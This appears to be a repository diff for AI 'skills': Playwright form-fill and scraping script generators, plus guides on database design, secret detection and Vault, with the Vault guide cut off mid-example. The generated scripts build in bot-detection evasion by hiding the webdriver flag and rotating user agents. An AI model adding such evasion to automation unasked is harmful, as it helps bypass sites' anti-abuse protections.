    - Selectors/values are escaped before interpolation so embedded double
      quotes or backslashes no longer produce syntactically broken scripts.
    - Checkbox truthiness coerces the value with str() first, so JSON booleans
      (true/false) work instead of crashing on bool.lower().
    """
    ftype = field["type"]
    selector = _escape_dq(field["selector"])
    value = _escape_dq(field.get("value", ""))
    # Label is only used in a generated comment, so it stays unescaped.
    label = field.get("label", field["selector"])
    prefix = " " * indent
    lines = [f"{prefix}# {label}"]
    if ftype == "checkbox":
        # Accept common truthy spellings; str() coerces JSON booleans.
        truthy = str(field.get("value", "true")).lower() in ("true", "yes", "1", "on")
        if truthy:
            lines.append(f'{prefix}await page.check("{selector}")')
        else:
            lines.append(f'{prefix}await page.uncheck("{selector}")')
    elif ftype == "radio":
        lines.append(f'{prefix}await page.check("{selector}")')
    elif ftype == "click":
        lines.append(f'{prefix}await page.click("{selector}")')
    elif ftype == "select":
        lines.append(f'{prefix}await page.select_option("{selector}", value="{value}")')
    elif ftype == "file":
        lines.append(f'{prefix}await page.set_input_files("{selector}", "{value}")')
    else:
        # text, password, email, textarea
        lines.append(f'{prefix}await page.fill("{selector}", "{value}")')
    # Add optional wait_after
    wait_after = field.get("wait_after")
    if wait_after:
        lines.append(f'{prefix}await page.wait_for_selector("{_escape_dq(wait_after)}")')
    return "\n".join(lines)
def build_form_script(url, fields, output_format="script"):
    """Build a Playwright form automation script from the field specification.

    Args:
        url: Target form URL, embedded verbatim into the generated script.
        fields: List of field-spec dicts (see validate_fields for the schema).
        output_format: "script" emits Python source text; "json" emits a
            config dict summarizing the job instead.

    Returns:
        A (result, issues) pair: on success result is the script text (or the
        config dict) and issues is None; on validation failure result is None
        and issues is the list of error messages.
    """
    issues = validate_fields(fields)
    if issues:
        return None, issues
    if output_format == "json":
        # JSON mode: machine-readable description of the job, no code.
        config = {
            "url": url,
            "fields": fields,
            "field_count": len(fields),
            "field_types": list(set(f["type"] for f in fields)),
            "has_file_upload": any(f["type"] == "file" for f in fields),
            "generated_at": datetime.now().isoformat(),
        }
        return config, None
    # Group fields into steps if step markers are present; fields without an
    # explicit "step" key default to step 1.
    steps = {}
    for field in fields:
        step = field.get("step", 1)
        if step not in steps:
            steps[step] = []
        steps[step].append(field)
    multi_step = len(steps) > 1
    # Generate step functions
    step_functions = []
    for step_num in sorted(steps.keys()):
        step_fields = steps[step_num]
        actions = "\n".join(generate_field_action(f) for f in step_fields)
        # NOTE(review): generate_field_action() emits actions indented 8
        # spaces; confirm the template indentation below yields a consistent
        # function body in the generated script.
        if multi_step:
            fn = textwrap.dedent(f"""\
async def fill_step_{step_num}(page):
        \"\"\"Fill form step {step_num} ({len(step_fields)} fields).\"\"\"
        print(f"Filling step {step_num}...")
{actions}
        print(f"Step {step_num} complete.")
""")
        else:
            fn = textwrap.dedent(f"""\
async def fill_form(page):
        \"\"\"Fill form ({len(step_fields)} fields).\"\"\"
        print("Filling form...")
{actions}
        print("Form filled.")
""")
        step_functions.append(fn)
    step_functions_str = "\n\n".join(step_functions)
    # Generate main() call sequence
    if multi_step:
        step_calls = "\n".join(
            f"        await fill_step_{n}(page)" for n in sorted(steps.keys())
        )
    else:
        step_calls = "        await fill_form(page)"
    # Locate the designated submit control, if any (first click field with
    # is_submit set).
    submit_selector = None
    for field in fields:
        if field.get("type") == "click" and field.get("is_submit"):
            submit_selector = field["selector"]
            break
    submit_block = ""
    if submit_selector:
        # NOTE(review): dedent() strips the common indentation of this block;
        # verify the inserted text aligns with main()'s body in the output.
        submit_block = textwrap.dedent(f"""\
        # Submit
        await page.click("{submit_selector}")
        await page.wait_for_load_state("networkidle")
        print("Form submitted.")
""")
    # Assemble the final script. Doubled braces ({{ }}) survive the f-string
    # as literal braces in the generated code.
    script = textwrap.dedent(f'''\
#!/usr/bin/env python3
"""
Auto-generated Playwright form automation script.
Target: {url}
Fields: {len(fields)}
Steps: {len(steps)}
Generated: {datetime.now().isoformat()}
Requirements:
    pip install playwright
    playwright install chromium
"""
import asyncio
import random
from playwright.async_api import async_playwright
URL = "{url}"
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]
{step_functions_str}
async def main():
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        context = await browser.new_context(
            viewport={{"width": 1920, "height": 1080}},
            user_agent=random.choice(USER_AGENTS),
        )
        page = await context.new_page()
        await page.add_init_script(
            "Object.defineProperty(navigator, \'webdriver\', {{get: () => undefined}});"
        )
        print(f"Navigating to {{URL}}...")
        await page.goto(URL, wait_until="networkidle")
{step_calls}
{submit_block}
        print("Automation complete.")
        await browser.close()
if __name__ == "__main__":
    asyncio.run(main())
''')
    return script, None
def main():
    """CLI entry point: load the field spec, build the script, write or print it.

    Exits 0 on success, 2 on any usage, file, or validation error.
    """
    parser = argparse.ArgumentParser(
        description="Generate Playwright form-fill automation scripts from a JSON field specification.",
        epilog=textwrap.dedent("""\
            Examples:
              %(prog)s --url https://example.com/signup --fields fields.json
              %(prog)s --url https://example.com/signup --fields fields.json --output fill_form.py
              %(prog)s --url https://example.com/signup --fields fields.json --json
            Field specification format (fields.json):
              [
                {"selector": "#email", "type": "email", "value": "user@example.com", "label": "Email"},
                {"selector": "#password", "type": "password", "value": "s3cret"},
                {"selector": "#country", "type": "select", "value": "US"},
                {"selector": "#terms", "type": "checkbox", "value": "true"},
                {"selector": "#avatar", "type": "file", "value": "/path/to/photo.jpg"},
                {"selector": "button[type='submit']", "type": "click", "is_submit": true}
              ]
            Supported field types: text, password, email, textarea, select, checkbox, radio, file, click
            Multi-step forms: Add "step": N to each field to group into steps.
        """),
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--url",
        required=True,
        help="Target form URL",
    )
    parser.add_argument(
        "--fields",
        required=True,
        help="Path to JSON file containing field specifications",
    )
    parser.add_argument(
        "--output",
        help="Output file path (default: stdout)",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        default=False,
        help="Output JSON configuration instead of Python script",
    )
    args = parser.parse_args()
    # Load fields
    fields_path = os.path.abspath(args.fields)
    if not os.path.isfile(fields_path):
        print(f"Error: Fields file not found: {fields_path}", file=sys.stderr)
        sys.exit(2)
    try:
        # NOTE(review): only JSON decode errors are caught; OS-level read
        # errors (permissions etc.) propagate as a traceback — confirm intended.
        with open(fields_path, "r") as f:
            fields = json.load(f)
    except json.JSONDecodeError as e:
        print(f"Error: Invalid JSON in {fields_path}: {e}", file=sys.stderr)
        sys.exit(2)
    output_format = "json" if args.json_output else "script"
    result, errors = build_form_script(
        url=args.url,
        fields=fields,
        output_format=output_format,
    )
    if errors:
        print("Validation errors:", file=sys.stderr)
        for err in errors:
            print(f"  - {err}", file=sys.stderr)
        sys.exit(2)
    # JSON mode returns a dict; script mode returns ready-to-write source text.
    if args.json_output:
        output_text = json.dumps(result, indent=2)
    else:
        output_text = result
    if args.output:
        output_path = os.path.abspath(args.output)
        with open(output_path, "w") as f:
            f.write(output_text)
        if not args.json_output:
            # Make the generated Python script executable for convenience.
            os.chmod(output_path, 0o755)
        print(f"Written to {output_path}", file=sys.stderr)
        sys.exit(0)
    else:
        print(output_text)
        sys.exit(0)


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,248 @@
#!/usr/bin/env python3
"""
Scraping Toolkit - Generates Playwright scraping script skeletons.
Takes a URL pattern and CSS selectors as input and produces a ready-to-run
Playwright scraping script with pagination support, error handling, and
anti-detection patterns baked in.
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import os
import sys
import textwrap
from datetime import datetime
def build_scraping_script(url, selectors, paginate=False, output_format="script"):
    """Build a Playwright scraping script from the given parameters.

    Args:
        url: Target URL embedded into the generated script.
        selectors: Comma-separated CSS selectors, one per extracted field.
        paginate: When True, include next-button pagination handling.
        output_format: "script" for Python source text, "json" for a config dict.

    Returns:
        A (result, error) pair: result is the script text (or config dict) and
        error is None on success; result is None and error is a message when
        no usable selectors were supplied.
    """
    selector_list = [s.strip() for s in selectors.split(",") if s.strip()]
    if not selector_list:
        return None, "No valid selectors provided."
    field_names = []
    for sel in selector_list:
        # Derive field name from selector: .product-title -> product_title
        name = sel.strip("#.[]()>:+~ ")
        name = name.replace("-", "_").replace(" ", "_").replace(".", "_")
        # Remove non-alphanumeric
        name = "".join(c if c.isalnum() or c == "_" else "" for c in name)
        if not name:
            # Positional fallback for selectors that normalize to nothing.
            name = f"field_{len(field_names)}"
        field_names.append(name)
    # NOTE(review): if two selectors normalize to the same field name,
    # dict(zip(...)) silently keeps only the last one — confirm selectors
    # yield distinct names.
    field_map = dict(zip(field_names, selector_list))
    if output_format == "json":
        # JSON mode: emit a machine-readable config instead of code.
        config = {
            "url": url,
            "selectors": field_map,
            "pagination": {
                "enabled": paginate,
                "next_selector": "a:has-text('Next'), button:has-text('Next')",
                "max_pages": 50,
            },
            "anti_detection": {
                "random_delay_ms": [800, 2500],
                "user_agent_rotation": True,
                "viewport": {"width": 1920, "height": 1080},
            },
            "output": {
                "format": "jsonl",
                "deduplicate_by": field_names[0] if field_names else None,
            },
            "generated_at": datetime.now().isoformat(),
        }
        return config, None
    # Build Python script: render the FIELDS dict literal for the template.
    fields_dict_str = "{\n"
    for name, sel in field_map.items():
        fields_dict_str += f'    "{name}": "{sel}",\n'
    fields_dict_str += "}"
    pagination_block = ""
    if paginate:
        # --- Pagination --- (helper injected at module level of the script)
        pagination_block = textwrap.dedent("""\
# --- Pagination ---
async def scrape_all_pages(page, container, fields, next_sel, max_pages=50):
    all_items = []
    for page_num in range(max_pages):
        print(f"Scraping page {page_num + 1}...")
        items = await extract_items(page, container, fields)
        all_items.extend(items)
        next_btn = page.locator(next_sel)
        if await next_btn.count() == 0:
            break
        try:
            is_disabled = await next_btn.is_disabled()
        except Exception:
            is_disabled = True
        if is_disabled:
            break
        await next_btn.click()
        await page.wait_for_load_state("networkidle")
        await asyncio.sleep(random.uniform(0.8, 2.5))
    return all_items
""")
    main_call = "scrape_all_pages(page, CONTAINER, FIELDS, NEXT_SELECTOR)" if paginate else "extract_items(page, CONTAINER, FIELDS)"
    # Assemble the final script; doubled braces become literal braces.
    script = textwrap.dedent(f'''\
#!/usr/bin/env python3
"""
Auto-generated Playwright scraping script.
Target: {url}
Generated: {datetime.now().isoformat()}
Requirements:
    pip install playwright
    playwright install chromium
"""
import asyncio
import json
import random
from playwright.async_api import async_playwright
# --- Configuration ---
URL = "{url}"
CONTAINER = "body"  # Adjust to the repeating item container selector
FIELDS = {fields_dict_str}
NEXT_SELECTOR = "a:has-text('Next'), button:has-text('Next')"
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]
async def extract_items(page, container_selector, field_map):
    """Extract structured data from repeating elements."""
    items = []
    cards = await page.query_selector_all(container_selector)
    for card in cards:
        item = {{}}
        for name, selector in field_map.items():
            el = await card.query_selector(selector)
            if el:
                item[name] = (await el.text_content() or "").strip()
            else:
                item[name] = None
        items.append(item)
    return items
{pagination_block}
async def main():
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        context = await browser.new_context(
            viewport={{"width": 1920, "height": 1080}},
            user_agent=random.choice(USER_AGENTS),
        )
        page = await context.new_page()
        # Remove WebDriver flag
        await page.add_init_script(
            "Object.defineProperty(navigator, \'webdriver\', {{get: () => undefined}});"
        )
        print(f"Navigating to {{URL}}...")
        await page.goto(URL, wait_until="networkidle")
        data = await {main_call}
        print(json.dumps(data, indent=2, ensure_ascii=False))
        await browser.close()
if __name__ == "__main__":
    asyncio.run(main())
''')
    return script, None
def main():
    """CLI entry point: parse args, generate the script/config, write or print it.

    Exits 0 on success, 2 on selector/usage errors.
    """
    parser = argparse.ArgumentParser(
        description="Generate Playwright scraping script skeletons from URL and selectors.",
        epilog=(
            "Examples:\n"
            "  %(prog)s --url https://example.com/products --selectors '.title,.price,.rating'\n"
            "  %(prog)s --url https://example.com/search --selectors '.name,.desc' --paginate\n"
            "  %(prog)s --url https://example.com --selectors '.item' --json\n"
            "  %(prog)s --url https://example.com --selectors '.item' --output scraper.py\n"
        ),
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--url",
        required=True,
        help="Target URL to scrape",
    )
    parser.add_argument(
        "--selectors",
        required=True,
        help="Comma-separated CSS selectors for data fields (e.g. '.title,.price,.rating')",
    )
    parser.add_argument(
        "--paginate",
        action="store_true",
        default=False,
        help="Include pagination handling in generated script",
    )
    parser.add_argument(
        "--output",
        help="Output file path (default: stdout)",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        default=False,
        help="Output JSON configuration instead of Python script",
    )
    args = parser.parse_args()
    output_format = "json" if args.json_output else "script"
    result, error = build_scraping_script(
        url=args.url,
        selectors=args.selectors,
        paginate=args.paginate,
        output_format=output_format,
    )
    if error:
        print(f"Error: {error}", file=sys.stderr)
        sys.exit(2)
    # JSON mode returns a dict; script mode returns ready-to-write source text.
    if args.json_output:
        output_text = json.dumps(result, indent=2)
    else:
        output_text = result
    if args.output:
        output_path = os.path.abspath(args.output)
        with open(output_path, "w") as f:
            f.write(output_text)
        if not args.json_output:
            # Make the generated Python script executable for convenience.
            os.chmod(output_path, 0o755)
        print(f"Written to {output_path}", file=sys.stderr)
        sys.exit(0)
    else:
        print(output_text)
        sys.exit(0)


if __name__ == "__main__":
    main()

View File

@@ -59,6 +59,229 @@ A comprehensive database design skill that provides expert-level analysis, optim
4. **Validate inputs**: Prevent SQL injection attacks
5. **Regular security updates**: Keep database software current
## Query Generation Patterns
### SELECT with JOINs
```sql
-- INNER JOIN: only matching rows
SELECT o.id, c.name, o.total
FROM orders o
INNER JOIN customers c ON c.id = o.customer_id;
-- LEFT JOIN: all left rows, NULLs for non-matches
SELECT c.name, COUNT(o.id) AS order_count
FROM customers c
LEFT JOIN orders o ON o.customer_id = c.id
GROUP BY c.name;
-- Self-join: hierarchical data (employees/managers)
SELECT e.name AS employee, m.name AS manager
FROM employees e
LEFT JOIN employees m ON m.id = e.manager_id;
```
### Common Table Expressions (CTEs)
```sql
-- Recursive CTE for org chart
WITH RECURSIVE org AS (
SELECT id, name, manager_id, 1 AS depth
FROM employees WHERE manager_id IS NULL
UNION ALL
SELECT e.id, e.name, e.manager_id, o.depth + 1
FROM employees e INNER JOIN org o ON o.id = e.manager_id
)
SELECT * FROM org ORDER BY depth, name;
```
### Window Functions
```sql
-- ROW_NUMBER for pagination / dedup
SELECT *, ROW_NUMBER() OVER (PARTITION BY customer_id ORDER BY created_at DESC) AS rn
FROM orders;
-- RANK with gaps, DENSE_RANK without gaps
SELECT name, score, RANK() OVER (ORDER BY score DESC) AS rank FROM leaderboard;
-- LAG/LEAD for comparing adjacent rows
SELECT date, revenue,
revenue - LAG(revenue) OVER (ORDER BY date) AS daily_change
FROM daily_sales;
```
### Aggregation Patterns
```sql
-- FILTER clause (PostgreSQL) for conditional aggregation
SELECT
COUNT(*) AS total,
COUNT(*) FILTER (WHERE status = 'active') AS active,
AVG(amount) FILTER (WHERE amount > 0) AS avg_positive
FROM accounts;
-- GROUPING SETS for multi-level rollups
SELECT region, product, SUM(revenue)
FROM sales
GROUP BY GROUPING SETS ((region, product), (region), ());
```
---
## Migration Patterns
### Up/Down Migration Scripts
Every migration must have a reversible counterpart. Name files with a timestamp prefix for ordering:
```
migrations/
├── 20260101_000001_create_users.up.sql
├── 20260101_000001_create_users.down.sql
├── 20260115_000002_add_users_email_index.up.sql
└── 20260115_000002_add_users_email_index.down.sql
```
### Zero-Downtime Migrations (Expand/Contract)
Use the expand-contract pattern to avoid locking or breaking running code:
1. **Expand** — add the new column/table (nullable, with default)
2. **Migrate data** — backfill in batches; dual-write from application
3. **Transition** — application reads from new column; stop writing to old
4. **Contract** — drop old column in a follow-up migration
### Data Backfill Strategies
```sql
-- Batch update to avoid long-running locks
UPDATE users SET email_normalized = LOWER(email)
WHERE id IN (SELECT id FROM users WHERE email_normalized IS NULL LIMIT 5000);
-- Repeat in a loop until 0 rows affected
```
### Rollback Procedures
- Always test the `down.sql` in staging before deploying `up.sql` to production
- Keep rollback window short — if the contract step has run, rollback requires a new forward migration
- For irreversible changes (dropping columns with data), take a logical backup first
---
## Performance Optimization
### Indexing Strategies
| Index Type | Use Case | Example |
|------------|----------|---------|
| **B-tree** (default) | Equality, range, ORDER BY | `CREATE INDEX idx_users_email ON users(email);` |
| **GIN** | Full-text search, JSONB, arrays | `CREATE INDEX idx_docs_body ON docs USING gin(to_tsvector('english', body));` |
| **GiST** | Geometry, range types, nearest-neighbor | `CREATE INDEX idx_locations ON places USING gist(coords);` |
| **Partial** | Subset of rows (reduce size) | `CREATE INDEX idx_active ON users(email) WHERE active = true;` |
| **Covering** | Index-only scans | `CREATE INDEX idx_cov ON orders(customer_id) INCLUDE (total, created_at);` |
### EXPLAIN Plan Reading
```sql
EXPLAIN (ANALYZE, BUFFERS, FORMAT TEXT) SELECT ...;
```
Key signals to watch:
- **Seq Scan** on large tables — missing index
- **Nested Loop** with high row estimates — consider hash/merge join or add index
- **Buffers shared read** much higher than **hit** — working set exceeds memory
### N+1 Query Detection
Symptoms: application issues one query per row (e.g., fetching related records in a loop).
Fixes:
- Use `JOIN` or subquery to fetch in one round-trip
- ORM eager loading (`select_related` / `includes` / `with`)
- DataLoader pattern for GraphQL resolvers
### Connection Pooling
| Tool | Protocol | Best For |
|------|----------|----------|
| **PgBouncer** | PostgreSQL | Transaction/statement pooling, low overhead |
| **ProxySQL** | MySQL | Query routing, read/write splitting |
| **Built-in pool** (HikariCP, SQLAlchemy pool) | Any | Application-level pooling |
**Rule of thumb:** Set pool size to `(2 * CPU cores) + disk spindles`. For cloud SSDs, start with `2 * vCPUs` and tune.
### Read Replicas and Query Routing
- Route all `SELECT` queries to replicas; writes to primary
- Account for replication lag (typically <1s for async, 0 for sync)
- On the replica, compare `pg_last_wal_receive_lsn()` with `pg_last_wal_replay_lsn()` (or check `pg_stat_replication` on the primary) to detect lag before reading critical data
---
## Multi-Database Decision Matrix
| Criteria | PostgreSQL | MySQL | SQLite | SQL Server |
|----------|-----------|-------|--------|------------|
| **Best for** | Complex queries, JSONB, extensions | Web apps, read-heavy workloads | Embedded, dev/test, edge | Enterprise .NET stacks |
| **JSON support** | Excellent (JSONB + GIN) | Good (JSON type) | Minimal | Good (OPENJSON) |
| **Replication** | Streaming, logical | Group replication, InnoDB cluster | N/A | Always On AG |
| **Licensing** | Open source (PostgreSQL License) | Open source (GPL) / commercial | Public domain | Commercial |
| **Max practical size** | Multi-TB | Multi-TB | ~1 TB (single-writer) | Multi-TB |
**When to choose:**
- **PostgreSQL** — default choice for new projects; best extensibility and standards compliance
- **MySQL** — existing MySQL ecosystem; simple read-heavy web applications
- **SQLite** — mobile apps, CLI tools, unit test databases, IoT/edge
- **SQL Server** — mandated by enterprise policy; deep .NET/Azure integration
### NoSQL Considerations
| Database | Model | Use When |
|----------|-------|----------|
| **MongoDB** | Document | Schema flexibility, rapid prototyping, content management |
| **Redis** | Key-value / cache | Session store, rate limiting, leaderboards, pub/sub |
| **DynamoDB** | Key-value / document | Serverless AWS apps, single-digit-ms latency at any scale |
> Use SQL as default. Reach for NoSQL only when the access pattern clearly benefits from it.
---
## Sharding & Replication
### Horizontal vs Vertical Partitioning
- **Vertical partitioning**: Split columns across tables (e.g., separate BLOB columns). Reduces I/O for narrow queries.
- **Horizontal partitioning (sharding)**: Split rows across databases/servers. Required when a single node cannot hold the dataset or handle the throughput.
### Sharding Strategies
| Strategy | How It Works | Pros | Cons |
|----------|-------------|------|------|
| **Hash** | `shard = hash(key) % N` | Even distribution | Resharding is expensive |
| **Range** | Shard by date or ID range | Simple, good for time-series | Hot spots on latest shard |
| **Geographic** | Shard by user region | Data locality, compliance | Cross-region queries are hard |
### Replication Patterns
| Pattern | Consistency | Latency | Use Case |
|---------|------------|---------|----------|
| **Synchronous** | Strong | Higher write latency | Financial transactions |
| **Asynchronous** | Eventual | Low write latency | Read-heavy web apps |
| **Semi-synchronous** | At-least-one replica confirmed | Moderate | Balance of safety and speed |
---
## Cross-References
- **sql-database-assistant** — query writing, optimization, and debugging for day-to-day SQL work
- **database-schema-designer** — ERD modeling, normalization analysis, and schema generation
- **migration-architect** — large-scale migration planning across database engines or major schema overhauls
- **senior-backend** — application-layer patterns (connection pooling, ORM best practices)
- **senior-devops** — infrastructure provisioning for database clusters and replicas
---
## Conclusion
Effective database design requires balancing multiple competing concerns: performance, scalability, maintainability, and business requirements. This skill provides the tools and knowledge to make informed decisions throughout the database lifecycle, from initial schema design through production optimization and evolution.

View File

@@ -76,3 +76,185 @@ python3 scripts/env_auditor.py /path/to/repo --json
2. Keep dev env files local and gitignored.
3. Enforce detection in CI before merge.
4. Re-test application paths immediately after credential rotation.
---
## Cloud Secret Store Integration
Production applications should never read secrets from `.env` files or environment variables baked into container images. Use a dedicated secret store instead.
### Provider Comparison
| Provider | Best For | Key Feature |
|----------|----------|-------------|
| **HashiCorp Vault** | Multi-cloud / hybrid | Dynamic secrets, policy engine, pluggable backends |
| **AWS Secrets Manager** | AWS-native workloads | Native Lambda/ECS/EKS integration, automatic RDS rotation |
| **Azure Key Vault** | Azure-native workloads | Managed HSM, Azure AD RBAC, certificate management |
| **GCP Secret Manager** | GCP-native workloads | IAM-based access, automatic replication, versioning |
### Selection Guidance
- **Single cloud provider** — use the cloud-native secret manager. It integrates tightly with IAM, reduces operational overhead, and costs less than self-hosting.
- **Multi-cloud or hybrid** — use HashiCorp Vault. It provides a uniform API across environments and supports dynamic secret generation (database credentials, cloud IAM keys) that expire automatically.
- **Kubernetes-heavy** — combine External Secrets Operator with any backend above to sync secrets into K8s `Secret` objects without hardcoding.
### Application Access Patterns
1. **SDK/API pull** — application fetches secret at startup or on-demand via provider SDK.
2. **Sidecar injection** — a sidecar container (e.g., Vault Agent) writes secrets to a shared volume or injects them as environment variables.
3. **Init container** — a Kubernetes init container fetches secrets before the main container starts.
4. **CSI driver** — secrets mount as a filesystem volume via the Secrets Store CSI Driver.
> **Cross-reference:** See `engineering/secrets-vault-manager` for production vault infrastructure patterns, HA deployment, and disaster recovery procedures.
---
## Secret Rotation Workflow
Stale secrets are a liability. Rotation ensures that even if a credential leaks, its useful lifetime is bounded.
### Phase 1: Detection
- Track secret creation and expiry dates in your secret store metadata.
- Set alerts at 30, 14, and 7 days before expiry.
- Use `scripts/env_auditor.py` to flag secrets with no recorded rotation date.
### Phase 2: Rotation
1. **Generate** a new credential (API key, database password, certificate).
2. **Deploy** the new credential to all consumers (apps, services, pipelines) in parallel.
3. **Verify** each consumer can authenticate using the new credential.
4. **Revoke** the old credential only after all consumers are confirmed healthy.
5. **Update** metadata with the new rotation timestamp and next rotation date.
### Phase 3: Automation
- **AWS Secrets Manager** — use built-in Lambda-based rotation for RDS, Redshift, and DocumentDB.
- **HashiCorp Vault** — configure dynamic secrets with TTLs; credentials are generated on-demand and auto-expire.
- **Azure Key Vault** — use Event Grid notifications to trigger rotation functions.
- **GCP Secret Manager** — use Pub/Sub notifications tied to Cloud Functions for rotation logic.
### Emergency Rotation Checklist
When a secret is confirmed leaked:
1. **Immediately revoke** the compromised credential at the provider level.
2. Generate and deploy a replacement credential to all consumers.
3. Audit access logs for unauthorized usage during the exposure window.
4. Scan git history, CI logs, and artifact registries for the leaked value.
5. File an incident report documenting scope, timeline, and remediation steps.
6. Review and tighten detection controls to prevent recurrence.
---
## CI/CD Secret Injection
Secrets in CI/CD pipelines require careful handling to avoid exposure in logs, artifacts, or pull request contexts.
### GitHub Actions
- Use **repository secrets** or **environment secrets** via `${{ secrets.SECRET_NAME }}`.
- Prefer **OIDC federation** (`aws-actions/configure-aws-credentials` with `role-to-assume`) over long-lived access keys.
- Environment secrets with required reviewers add approval gates for production deployments.
- GitHub automatically masks secrets in logs, but avoid `echo` or `toJSON()` on secret values.
### GitLab CI
- Store secrets as **CI/CD variables** with the `masked` and `protected` flags enabled.
- Use **HashiCorp Vault integration** (`secrets:vault`) for dynamic secret injection without storing values in GitLab.
- Scope variables to specific environments (`production`, `staging`) to enforce least privilege.
### Universal Patterns
- **Never echo or print** secret values in pipeline output, even for debugging.
- **Use short-lived tokens** (OIDC, STS AssumeRole) instead of static credentials wherever possible.
- **Restrict PR access** — do not expose secrets to pipelines triggered by forks or untrusted branches.
- **Rotate CI secrets** on the same schedule as application secrets; pipeline credentials are attack vectors too.
- **Audit pipeline logs** periodically for accidental secret exposure that masking may have missed.
---
## Pre-Commit Secret Detection
Catching secrets before they reach version control is the most cost-effective defense. Two leading tools cover this space.
### gitleaks
```toml
# .gitleaks.toml — minimal configuration
[extend]
useDefault = true
[[rules]]
id = "custom-internal-token"
description = "Internal service token pattern"
regex = '''INTERNAL_TOKEN_[A-Za-z0-9]{32}'''
secretGroup = 0
```
- Install: `brew install gitleaks` or download from GitHub releases.
- Pre-commit hook: `gitleaks git --pre-commit --staged`
- Baseline scanning: `gitleaks detect --source . --report-path gitleaks-report.json` (pre-v8.19 syntax; newer releases use `gitleaks git` / `gitleaks dir` instead)
- Manage false positives in `.gitleaksignore` (one fingerprint per line).
### detect-secrets
```bash
# Generate baseline
detect-secrets scan --all-files > .secrets.baseline
# Pre-commit hook (via pre-commit framework)
# .pre-commit-config.yaml
repos:
- repo: https://github.com/Yelp/detect-secrets
rev: v1.5.0
hooks:
- id: detect-secrets
args: ['--baseline', '.secrets.baseline']
```
- Supports **custom plugins** for organization-specific patterns.
- Audit workflow: `detect-secrets audit .secrets.baseline` interactively marks true/false positives.
### False Positive Management
- Maintain `.gitleaksignore` or `.secrets.baseline` in version control so the whole team shares exclusions.
- Review false positive lists during security audits — patterns may mask real leaks over time.
- Prefer tightening regex patterns over broadly ignoring files.
---
## Audit Logging
Knowing who accessed which secret and when is critical for incident investigation and compliance.
### Cloud-Native Audit Trails
| Provider | Service | What It Captures |
|----------|---------|-----------------|
| **AWS** | CloudTrail | Every `GetSecretValue`, `DescribeSecret`, `RotateSecret` API call |
| **Azure** | Activity Log + Diagnostic Logs | Key Vault access events, including caller identity and IP |
| **GCP** | Cloud Audit Logs | Data access logs for Secret Manager with principal and timestamp |
| **Vault** | Audit Backend | Full request/response logging (file, syslog, or socket backend) |
### Alerting Strategy
- Alert on **access from unknown IP ranges** or service accounts outside the expected set.
- Alert on **bulk secret reads** (more than N secrets accessed within a time window).
- Alert on **access outside deployment windows** when no CI/CD pipeline is running.
- Feed audit logs into your SIEM (Splunk, Datadog, Elastic) for correlation with other security events.
- Review audit logs quarterly as part of access recertification.
---
## Cross-References
This skill covers env hygiene and secret detection. For deeper coverage of related domains, see:
| Skill | Path | Relationship |
|-------|------|-------------|
| **Secrets Vault Manager** | `engineering/secrets-vault-manager` | Production vault infrastructure, HA deployment, DR |
| **Senior SecOps** | `engineering/senior-secops` | Security operations perspective, incident response |
| **CI/CD Pipeline Builder** | `engineering/ci-cd-pipeline-builder` | Pipeline architecture, secret injection patterns |
| **Infrastructure as Code** | `engineering/infrastructure-as-code` | Terraform/Pulumi secret backend configuration |
| **Container Orchestration** | `engineering/container-orchestration` | Kubernetes secret mounting, sealed secrets |

View File

@@ -0,0 +1,403 @@
---
name: "secrets-vault-manager"
description: "Use when the user asks to set up secret management infrastructure, integrate HashiCorp Vault, configure cloud secret stores (AWS Secrets Manager, Azure Key Vault, GCP Secret Manager), implement secret rotation, or audit secret access patterns."
---
# Secrets Vault Manager
**Tier:** POWERFUL
**Category:** Engineering
**Domain:** Security / Infrastructure / DevOps
---
## Overview
Production secret infrastructure management for teams running HashiCorp Vault, cloud-native secret stores, or hybrid architectures. This skill covers policy authoring, auth method configuration, automated rotation, dynamic secrets, audit logging, and incident response.
**Distinct from env-secrets-manager** which handles local `.env` file hygiene and leak detection. This skill operates at the infrastructure layer — Vault clusters, cloud KMS, certificate authorities, and CI/CD secret injection.
### When to Use
- Standing up a new Vault cluster or migrating to a managed secret store
- Designing auth methods for services, CI runners, and human operators
- Implementing automated credential rotation (database, API keys, certificates)
- Auditing secret access patterns for compliance (SOC 2, ISO 27001, HIPAA)
- Responding to a secret leak that requires mass revocation
- Integrating secrets into Kubernetes workloads or CI/CD pipelines
---
## HashiCorp Vault Patterns
### Architecture Decisions
| Decision | Recommendation | Rationale |
|----------|---------------|-----------|
| Deployment mode | HA with Raft storage | No external dependency, built-in leader election |
| Auto-unseal | Cloud KMS (AWS KMS / Azure Key Vault / GCP KMS) | Eliminates manual unseal, enables automated restarts |
| Namespaces | One per environment (dev/staging/prod) | Blast-radius isolation, independent policies |
| Audit devices | File + syslog (dual) | Vault refuses requests if all audit devices fail — dual prevents outages |
### Auth Methods
**AppRole** — Machine-to-machine authentication for services and batch jobs.
```hcl
# Policy granting management of the AppRole auth mount (the method itself is enabled separately with: vault auth enable approle)
path "auth/approle/*" {
capabilities = ["create", "read", "update", "delete", "list"]
}
# Application-specific role
vault write auth/approle/role/payment-service \
token_ttl=1h \
token_max_ttl=4h \
secret_id_num_uses=1 \
secret_id_ttl=10m \
token_policies="payment-service-read"
```
**Kubernetes** — Pod-native authentication via service account tokens.
```hcl
vault write auth/kubernetes/role/api-server \
